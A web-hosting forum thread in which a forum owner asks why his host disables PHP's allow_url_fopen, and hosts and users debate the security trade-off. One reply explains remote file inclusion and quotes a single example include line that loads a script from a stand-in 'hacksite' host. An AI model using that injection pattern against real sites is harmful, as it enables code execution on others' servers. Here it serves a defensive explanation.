why hosts refused to enable allow_url_fopen PHP setting?

i need to install RSS To Post plugin in mybb forum at satnetforum.com
It needs following function in server.

'Your allow_url_fopen PHP setting is currently disabled. RSS To Post will NOT function.'

is it possible to enable the function at server level?

any host here to support such requirement?

my present host suntex hosting refused to do so.

i am considering to move my forum to suitable host.

 

99% hosts allow it. 1% don't allow it.
2 reasons: 1) Rapidleech 2)They are free hosts

 

most hosts allow it, not sure if I'd say 99% of all hosts and they refused to enable it for you? time to move out then lol

 

my present host suntex hosting refused to do so.
is there any security related problem?
that's why is ask here?

 

It did has security problems, it may overload the server if everyone use spider to grab the content. It need to agreed with your host when using that. I think it wont be a problem in most of the case.

 

it's not a security risk because the feature is used to grab content from outside sources - usually used in scripts that update, for example, a shoutcast monitoring script where it tells you what song is currently playing and how many listeners there are

and as long as it isn't trying to grab a 1000 things from a 1000 different websites, it won't overload anything. Some people try to open search engines with this and if a host has a good monitoring system, they will be able to stop the server from even coming close to overloading.

I guess your current host doesn't want to take the risk or they don't want to be bothered with it, OR they don't even have control over it, I am not familiar with the company so I can't say for sure.

 

We are currently allowing this to our Customer

and there are too much other hosts which allows this

 

If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents() and the include and require statements -- can retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.

Host really care about the security of the server usually disable it.

allow_url_fopen is on by default. A typical server owners will not really know about this. They arent aware of these things so dont bother to disable it.

We use alterted php configuration to get the maximum security. And we know what are we doing.

Hosts like dreamhost is not allowing it


If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

include("http://yourdomain.com/index.php?page=http://hacksite .net/evilscript.txt");


These kind of attack logs can be found simply by checking the ModSecurity Log file. I have seen thse attacks towards the joomla sites.



So to avoid potential compromisse of our clients websites the PHP variable allow_url_fopen=off is on all our servers now


Check this too



So basically I will say, those say this is not a security risk, they dont know actually what they are saying.


Vivek

 

thanks for this information

 

In some cases, web hosts see it as a security risk so they wouldn't allow it to the public. But a simple ticket would enable them to open it for you on a per-account basis.

 

per account basis ?
Can you tell me how can I enabled it for a single account ?
I really dont think so.

 

http://us.php.net/manual/en/configuration.changes.php

 

Well, I know some settings can be changed for a single virtual host using .htaccess or editing the httpd.conf manually.
But I am not able to find allow_url_fopen on that page ?

 

Anyways, we do not want to disappoint any of our clients.
I just enabled it and will be putting an eye on it for some days.

 

great help thanks.
i have multiple hosting accounts.
All others are enabled the above setting.
That's why i ask here.

 

You can tell your customer to make their own php.ini file in their FTP and they can turn on the function from their end.